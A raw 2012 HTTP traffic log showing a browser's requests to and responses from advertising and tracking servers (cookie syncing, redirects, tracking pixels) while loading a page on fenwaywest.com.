Set-Cookie: rtbData0=&quot;key=turn:value=3788424827722360895:expiresAt=Sat+Nov+24+17%3A30%3A44+PST+2012:32-Compatible=true&quot;;Path=/;Domain=.adap.tv;Expires=Tue, 18-Nov-2014 01:30:44 GMT
Content-Length: 42
GET /cms/v1?esig=1~862d802dd86fb59368388ad078a7f298ddbbd0b7&nwid=10000424978&sigv=1 HTTP/1.1

Host: ad.yieldmanager.com
GET /cms/v1?esig=1~862d802dd86fb59368388ad078a7f298ddbbd0b7&amp;nwid=10000424978&amp;sigv=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=3788424827722360895&amp;rnd=3716367233684432959&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
HTTP/1.1 302 Found

Content-Type: text/plain; charset=utf-8
Date: Sun, 18 Nov 2012 01:30:44 GMT
P3P: policyref=&quot;http://p3p.yahoo.com/w3c/p3p.xml&quot;, CP=&quot;CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV&quot;
Location: http://r.turn.com/r/cms/id/0/ddc/1/pid/43/uid/?xid=E0
Cache-Control: private
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
Server: YTS/1.20.13
GET /imp?anmember=514&anprice=50&Z=160x600&s=653070&r=0&_salt=1916686269&u=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&u=http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html HTTP/1.1

Host: ad.yieldmanager.com
GET /imp?anmember=514&amp;anprice=50&amp;Z=160x600&amp;s=653070&amp;r=0&amp;_salt=1916686269&amp;u=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&amp;u=http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html
HTTP/1.1 302 Found

HTTP/1.1 302 Found
Date: Sun, 18 Nov 2012 01:30:44 GMT
Server: YTS/1.20.13
X-RightMedia-Hostname: raptor0016.rm.bf1.yahoo.com
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Set-Cookie: testbounce=testing; path=/
Location: http://ad.yieldmanager.com/imp?anmember=514&amp;anprice=50&amp;Z=160x600&amp;s=653070&amp;r=0&amp;_salt=1916686269&amp;u=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&amp;u=http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&amp;B=1
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Vary: *
Last-Modified: Sun, 18 Nov 2012 01:30:44 GMT
Expires: Sun, 18 Nov 2012 01:30:44 GMT
Pragma: no-cache
Content-Encoding: gzip
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
GET /notify/js?exch=ctw&id=5aW95q2jLzEvUTFacmFXRlpjazF3UTFOb09WVkpkMjFCV2xwaFVRL05UQmhPRE5oTTJZdE9ESTBZeTAwT1RSakxXRTJZekV0T0dReU1UZzBOV000Tmpjei8xMzUwMDQ2MzExMTMzMTUxMDQzLzIzOTUyOC8xNjM0ODEvMTEvY1pPVUl2YUJmVUZqS3JnVnVBUzFvRXVwMHNkdjktbGhqTE5QNTZmOXpaNC8/3pDavxPxc_C-g-kCsajJUFViM5k&sid=163481&cid=239528&price=UKg6wQAHgeAh-RGAaSg0v0MZ8gQ3ae_39Ttsbw HTTP/1.1

Host: bidder.mathtag.com
GET /notify/js?exch=ctw&amp;id=5aW95q2jLzEvUTFacmFXRlpjazF3UTFOb09WVkpkMjFCV2xwaFVRL05UQmhPRE5oTTJZdE9ESTBZeTAwT1RSakxXRTJZekV0T0dReU1UZzBOV000Tmpjei8xMzUwMDQ2MzExMTMzMTUxMDQzLzIzOTUyOC8xNjM0ODEvMTEvY1pPVUl2YUJmVUZqS3JnVnVBUzFvRXVwMHNkdjktbGhqTE5QNTZmOXpaNC8/3pDavxPxc_C-g-kCsajJUFViM5k&amp;sid=163481&amp;cid=239528&amp;price=UKg6wQAHgeAh-RGAaSg0v0MZ8gQ3ae_39Ttsbw HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: uuid=50a83a3f-824c-494c-a6c1-8d21845c8673; mt_mop=11:1353202243
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Sun, 18 Nov 2012 01:30:44 GMT
P3P: CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Set-Cookie: mt_mop=11:1353202243|4:1353202244|10008:1353202244; domain=.mathtag.com; path=/; expires=Wed, 18 Nov 2015 01:30:44 GMT
Last-Modified: Sun, 18 Nov 2012 01:30:43 GMT
x-mm-dbg: won
Content-Length: 1685
x-mm-host: zrh-bidder-x14, ewr-bidder-x14
Server: MMBD/3.18.2
Connection: keep-alive
GET /r/cms/id/0/ddc/1/pid/43/uid/?xid=E0 HTTP/1.1

Host: r.turn.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=3788424827722360895&amp;rnd=3716367233684432959&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
Cookie: uid=3788424827722360895; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C9%7C1001%7Cundefined%7Cundefined%7C10%7Cundefined%7Cundefined%7C12%7Cundefined%7Cundefined%7Cundefined%7C13%7C14%7C15%7Cundefined%7Cundefined%7C16%7C18%7C21%7Cundefined%7Cundefined%7Cundefined%7C26%7Cundefined%7C27; rds=15662%7C15662%7C15662%7C15662%7C15662%7C15662%7C15662%7C15662%7C15662%7Cundefined%7Cundefined%7C15662%7Cundefined%7Cundefined%7C15662%7Cundefined%7Cundefined%7Cundefined%7C15662%7C15662%7C15662%7Cundefined%7Cundefined%7C15662%7C15662%7C15662%7Cundefined%7Cundefined%7Cundefined%7C15662%7Cundefined%7C15662; rv=1
HTTP/1.1 200 OK

Content-Type: image/gif
Server: Apache-Coyote/1.1
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV&quot;
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3788424827722360895; Domain=.turn.com; Expires=Fri, 17-May-2013 01:30:44 GMT; Path=/
Content-Length: 43
Date: Sun, 18 Nov 2012 01:30:43 GMT
GET /bh/rtset?do=add&pid=545979&ev=5858721859426781856 HTTP/1.1

Host: bh.contextweb.com
GET /bh/rtset?do=add&amp;pid=545979&amp;ev=5858721859426781856 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
Cookie: C2W4=3hj8VJekE1xLFEu52vJsr0gR__DD7av_eKsLGmaFwbkP3DUjJz8gRIA; cw=cw; 66902_160X600__POSUNKNOWNXUNKNOWN=1353202367221; V=A4M4pJeeQdJ7; vf=2; wf=0; pb_rtb_ev=2-535461.3788424827722360895.0.0.1353202243723|530731..0.0.1353202242915|531399..0.0.1353202242915|530912..0.0.1353202242915|535495..0.0.1353202242915|540281..0.0.1353202242915|534301..0.0.1353202242915|535393..0.0.1353202242915|541254..0.0.1353202242915|537085..0.0.1353202242915|543921..0.0.1353202242915|536088..0.0.1353202242915|538569.f45883da-a5b2-4229-92e5-ccb518d47872.0.0.1353202243267|545979..0.0.1353202242915|531292..0.0.1353202242915|543604..0.0.1353202242915|535039.125566b7-7167-49cb-824d-ca43d86c9ec7.0.0.1353202244248|530739.50a83a3f-824c-494c-a6c1-8d21845c8673.0.0.1353202243485|537583..0.0.1353202242915|547259..0.0.1353202242915
HTTP/1.1 200 OK

Content-Type: image/gif;charset=ISO-8859-1
Cache-Control: private, max-age=0, no-cache, no-store
Content-Language: en-US
CW-Server: ip-10-119-17-88
Date: Sun, 18 Nov 2012 01:30:43 GMT
Expires: -1
P3P: policyref=&quot;/bh/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;
Server: GlassFish v3
Set-Cookie: V=A4M4pJeeQdJ7; Domain=.contextweb.com; Expires=Wed, 13-Nov-2013 01:30:44 GMT; Path=/ pb_rtb_ev=2-530731..0.0.1353202242915|535461.3788424827722360895.0.0.1353202243723|531399..0.0.1353202242915|530912..0.0.1353202242915|535495..0.0.1353202242915|540281..0.0.1353202242915|534301..0.0.1353202242915|535393..0.0.1353202242915|537085..0.0.1353202242915|541254..0.0.1353202242915|536088..0.0.1353202242915|543921..0.0.1353202242915|538569.f45883da-a5b2-4229-92e5-ccb518d47872.0.0.1353202243267|545979.5858721859426781856.0.0.1353202244362|531292..0.0.1353202242915|535039.125566b7-7167-49cb-824d-ca43d86c9ec7.0.0.1353202244248|543604..0.0.1353202242915|530739.50a83a3f-824c-494c-a6c1-8d21845c8673.0.0.1353202243485|537583..0.0.1353202242915|547259..0.0.1353202242915; Domain=.contextweb.com; Expires=Mon, 18-Nov-2013 01:30:44 GMT; Path=/
Content-Length: 49
Connection: keep-alive
GET /b?c1=8&c2=2102&c3=0&c4=800421&c5=610742&c15=&c16=&ns__t=1353202244472&ns_c=UTF-8&c8=http%3A%2F%2Fwww.fenwaywest.com%2Findex.php%3Foption%3Dcom_content%26amp%3Bview%3Darticle%26amp%3Bid%3D7%26amp%3BItemid%3D101&c7=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&c9=http%3A%2F%2Fwww.shinynylonarts.com%2F HTTP/1.1

Host: b.scorecardresearch.com
GET /b?c1=8&amp;c2=2102&amp;c3=0&amp;c4=800421&amp;c5=610742&amp;c15=&amp;c16=&amp;ns__t=1353202244472&amp;ns_c=UTF-8&amp;c8=http%3A%2F%2Fwww.fenwaywest.com%2Findex.php%3Foption%3Dcom_content%26amp%3Bview%3Darticle%26amp%3Bid%3D7%26amp%3BItemid%3D101&amp;c7=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;c9=http%3A%2F%2Fwww.shinynylonarts.com%2F HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: UID=546eda-195.159.219.9-1353202238; UIDR=1353202238
HTTP/1.1 204 No Content

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sun, 18 Nov 2012 01:30:44 GMT
Connection: keep-alive
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
GET /pixel/p-01-0VIaSjnOLg.gif?tags=CONTEXTWEB.UNCONTEXTUALIZED,PUBLISHER.520266,,CAMPAIGN.610742.800421,,ADSIZE.300X250 HTTP/1.1

Host: pixel.quantserve.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: mc=50a83a3c-b2d37-9dbcd-25149
HTTP/1.1 200 OK

Content-Type: image/gif
Connection: close
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 35
Date: Sun, 18 Nov 2012 01:30:44 GMT
Server: QS
GET /adserver/ako?rsi_random=007488868&rsi_pub=5EDFA30EEE61C6AE22A15EFEDE1C37E5&rsi_site=8EAA6BB1DC11BF97CF079B3861A1A66E&rsi_width=300&rsi_height=250&rsi_secure=0&rsi_url=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&rsi_referrer=http%3A%2F%2Fwww.shinynylonarts.com%2F&rsi_title=http%3A%2F%2Fwww.fenwaywest.com%2Findex.php%3Foption%3Dcom_content%26amp%3Bview%3Darticle%26amp%3Bid%3D7%26amp%3BItemid%3D101&rsi_inf=1 HTTP/1.1

Host: ads.revsci.net
GET /adserver/ako?rsi_random=007488868&amp;rsi_pub=5EDFA30EEE61C6AE22A15EFEDE1C37E5&amp;rsi_site=8EAA6BB1DC11BF97CF079B3861A1A66E&amp;rsi_width=300&amp;rsi_height=250&amp;rsi_secure=0&amp;rsi_url=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;rsi_referrer=http%3A%2F%2Fwww.shinynylonarts.com%2F&amp;rsi_title=http%3A%2F%2Fwww.fenwaywest.com%2Findex.php%3Foption%3Dcom_content%26amp%3Bview%3Darticle%26amp%3Bid%3D7%26amp%3BItemid%3D101&amp;rsi_inf=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: rsiPus_AAAA=&quot;MLuBMx7UQh8FEhABFBNH3FQTABMURRE4k97FBwWUExVaF0JXdF3cx8oFxppt8AlAFw9vawljazo=&quot;
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref=&quot;http://js.revsci.net/w3c/rsip3p.xml&quot;, CP=&quot;NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA&quot;
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsiPus_AAAA=&quot;&quot;; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver rsiPus_AAAA=&quot;&quot;; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ rsiPus_AAAA=&quot;MLtPrU93sF9jJTEyMxFbC3wKxCxX/UP6270FwVZaZE++vl4MJaacZ5XQBQ2DvFVuvwpHRw6KybcU9erDO9vXlm2ekpa8sk+u+LXJBx85jeA9ISSsy0I/NsBxp/VcMO18GnXBWafgSAzHj8jR43+z91+MW9AgmZxN4g==&quot;; Version=1; Domain=.revsci.net; Max-Age=63072000; Path=/
Location: http://adnxs.revsci.net/imp?Z=300x250&amp;s=1651067&amp;r=0&amp;_salt=420036788&amp;u=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php
Content-Length: 0
Date: Sun, 18 Nov 2012 01:30:44 GMT
GET /pixel?google_nid=mediamath&google_cm&google_hm=NTBhODNhM2YtODI0Yy00OTRjLWE2YzEtOGQyMTg0NWM4Njcz HTTP/1.1

Host: cm.g.doubleclick.net
GET /pixel?google_nid=mediamath&amp;google_cm&amp;google_hm=NTBhODNhM2YtODI0Yy00OTRjLWE2YzEtOGQyMTg0NWM4Njcz HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: id=223ae1776901005b||t=1350343758|et=730|cs=002213fd480aa30e9cef2f5d42
HTTP/1.1 200 OK

Content-Type: image/png
Date: Sun, 18 Nov 2012 01:30:44 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Server: Cookie Matcher
Content-Length: 170
X-XSS-Protection: 1; mode=block
GET /imp?anmember=514&anprice=50&Z=160x600&s=653070&r=0&_salt=1916686269&u=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&u=http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&B=1 HTTP/1.1

Host: ad.yieldmanager.com
GET /imp?anmember=514&amp;anprice=50&amp;Z=160x600&amp;s=653070&amp;r=0&amp;_salt=1916686269&amp;u=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&amp;u=http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&amp;B=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html
Cookie: testbounce=testing
HTTP/1.1 302 Found

HTTP/1.1 302 Found
Date: Sun, 18 Nov 2012 01:30:44 GMT
Server: YTS/1.20.13
X-RightMedia-Hostname: raptor0023.rm.bf1.yahoo.com
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Location: http://cookex.amp.yahoo.com/v2/cexposer/SIG=1b6lchm45/*http%3A//ad.yieldmanager.com/imp?anmember=514&amp;anprice=50&amp;Z=160x600&amp;s=653070&amp;r=0&amp;_salt=1916686269&amp;u=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&amp;u=http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&amp;B=1
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Vary: *
Last-Modified: Sun, 18 Nov 2012 01:30:44 GMT
Expires: Sun, 18 Nov 2012 01:30:44 GMT
Pragma: no-cache
Content-Encoding: gzip
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
GET /imp?Z=300x250&s=1651067&r=0&_salt=420036788&u=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php HTTP/1.1

Host: adnxs.revsci.net
GET /imp?Z=300x250&amp;s=1651067&amp;r=0&amp;_salt=420036788&amp;u=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: rsiPus_AAAA=&quot;MLtPrU93sF9jJTEyMxFbC3wKxCxX/UP6270FwVZaZE++vl4MJaacZ5XQBQ2DvFVuvwpHRw6KybcU9erDO9vXlm2ekpa8sk+u+LXJBx85jeA9ISSsy0I/NsBxp/VcMO18GnXBWafgSAzHj8jR43+z91+MW9AgmZxN4g==&quot;
HTTP/1.1 200 OK

Content-Type: text/javascript
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Date: Sun, 18 Nov 2012 01:30:44 GMT
Content-Length: 459
GET /adi/N3814.290927.AFFIPERF.COM19/B7153410;sz=300x250;ord=1350046311133151043;click=http://pixel.mathtag.com/click/img?mt_aid=1350046311133151043&mt_id=239528&mt_adid=100412&mt_uuid=50a83a3f-824c-494c-a6c1-8d21845c8673&redirect= HTTP/1.1

Host: ad.doubleclick.net
GET /adi/N3814.290927.AFFIPERF.COM19/B7153410;sz=300x250;ord=1350046311133151043;click=http://pixel.mathtag.com/click/img?mt_aid=1350046311133151043&amp;mt_id=239528&amp;mt_adid=100412&amp;mt_uuid=50a83a3f-824c-494c-a6c1-8d21845c8673&amp;redirect= HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: id=223ae1776901005b||t=1350343758|et=730|cs=002213fd480aa30e9cef2f5d42
HTTP/1.1 200 OK

Content-Type: text/html
Server: DCLK-AdSvr
Content-Length: 1743
Content-Encoding: gzip
Date: Sun, 18 Nov 2012 01:30:44 GMT
GET /load/?p=200&g=300&buid=50a83a3f-824c-494c-a6c1-8d21845c8673 HTTP/1.1

Host: load.exelator.com
GET /load/?p=200&amp;g=300&amp;buid=50a83a3f-824c-494c-a6c1-8d21845c8673 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: ud=eJxrWVyWWnRgUUnxaccrWnwT9NbvWBzq6XKLQcHCMM3E0Dgx2TLFNNk8xdjQzNDU3NTYzCjR1NAsOcXSZEl%252BUWb6Ij9%252FAElfF0E%253D; inv=eJxrXFySlnaHQeLMGXfms%252BocS4wMTczBxFl1bgSHAcE8c4aBEYnLgMIDAAJpF0Q%253D; xud=eJyNz09Og0AUBnA0rj0DC1cmGAZmGFgOhVaSliH8iWFFKAyRpC0JYFuXJu71AC5MaWxqNR7EuHPV00haDuDy%252B%252FJ77%252BU9NnNWnq3q6pv8Xp4%252FX729rJeTevLUBJax53gVZBDIcaKlKMGpDBSAMJIVKUZASVIN7u7yNPIkETqBvucuMMK4Bw0iyJqGBAiQLGhE1AXc0zQJ630gAvlzHg1MGvVoYPtuuLLpx7FwzYFF7RWQ3jtg%252BeGaVpNie8zGiHAddajnk%252BHr1zER1yTtOsPkWhmQyA8dc6OXxaJi5e7Q9MnIGoabfl6yrFhuDh31tjf5LG0Vj7sLlue0LzvFgpU%252BS255a5YV5TSu82LGe%252FdVzaYVT7wOU3fwf2yb%252FmkTkOt2QkkzPE7iVGRQBkjNkITEGGFFTGKVqWPQjLPs4edkvpYAxH%252B0n43I; xudx=eJwBLwDQ%252F4OjdmVyAqJ0c8tB1CoOkC6mnKNldniBzQhjgc5QqDpBmc0nCwHMzEcBAAHNAXYB%252BC0TRw%253D%253D; udo=eJyNkE1Og1AURqEDNTFxDQxMTExqeMDjwfC1pUjSAuEnhhGh8FCStiSAtC7AsS6gA1Mam1qNC7GdOepqJG0X4PA7Od%252B9ufe5KknWmBf5D%252F69vni9eZ9VpJzOtlfn9PYsPN1s1BOaord0SS%252Bmw2L4UrlaZ0cxEogFwAehHMEQRTwQAUSQF7kAAjGMZGH9mES%252BzbGC6bZ21CWCCLWFDm7ysgybAoB8U8Zsq4nassyhVhewgP8qfVUx%252FLbh6o7lzXXj8wAsRdUMfQ64j6OgOd7CyIfp6pA7fUwdVdOwHdx7%252Bz4kbCm4HtdRqNp0se94prJsZekkJ9l6T7q4r%252FW8ZTfJSJxOl3tm2Ku7ZBzVFoOOGzTbrE820wnJHBI%252BMNo4TrNRUCTpmLGf8oKMcgbbR9mw1P%252FLuuI0Khff1g0xitEgDCKWCDyAUgw5yAYQiWwYSEQagEWaJff1V%252F4AW5CUUA%253D%253D
HTTP/1.1 200 OK

Content-Type: application/x-javascript
X-Powered-By: PHP/5.3.17
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Set-Cookie: inv=eJxrXFySlnaHQevMGXfms%252BocS4wMTczBxFl1bgSHAcE8c4aBEYnLgMI7c%252BIsow66OezYzTmBohMAgIspAw%253D%253D; expires=Mon, 18-Mar-2013 01:30:44 GMT; path=/; domain=exelator.com xud=eJyNz09qg0AUBnBbuuiqqx7ARemiIDjqOLoco0mFxBH%252FUFyJ0ZEKSQS1SbosdF96gxIDkqalBynZdZUr9BKVxAN0%252BX383nu853pOi7NVVX7jn5uL1%252Bvfy%252FVyUk1eat%252FU9wyrgFQCYhSrCYxRIgIZQARFWYggkONElbYPWRK6Ai%252FZvrZnrhBEqCfpmBNVFXISgCKnYl7jUE9VBaT1AQ%252FEz3k4MEjYI77lOcHKIh%252FHwjEGJrFWQHjvgOkFa1JO8s0x6yPMdNQmroeHb1%252FHhB0Dt%252Bt0g2mlj0MvsI1GK%252FJFSYvtoenjkTkMmn5W0DRfNoeOuJu7bJa0ikXdBdO125ftfEELj8b3rDlL82IaVVk%252BY93HsqLTksVuh4kz%252BD%252B2DO%252B09vFtOyEnKRrHUcJTSQRQSaEA%252BQgimY8jhSpjUI%252FT9Gl3Mt%252Bdx38nmo1E; expires=Mon, 18-Mar-2013 01:30:44 GMT; path=/; domain=exelator.com xudx=eJwBLwDQ%252F4OjdmVyAqJ0c8tB1CoOkSbrFKNldniBzQhjgc5QqDpBmc0nCwHMzEcBAAHNAXYB77kS%252FQ%253D%253D; expires=Mon, 18-Mar-2013 01:30:44 GMT; path=/; domain=exelator.com 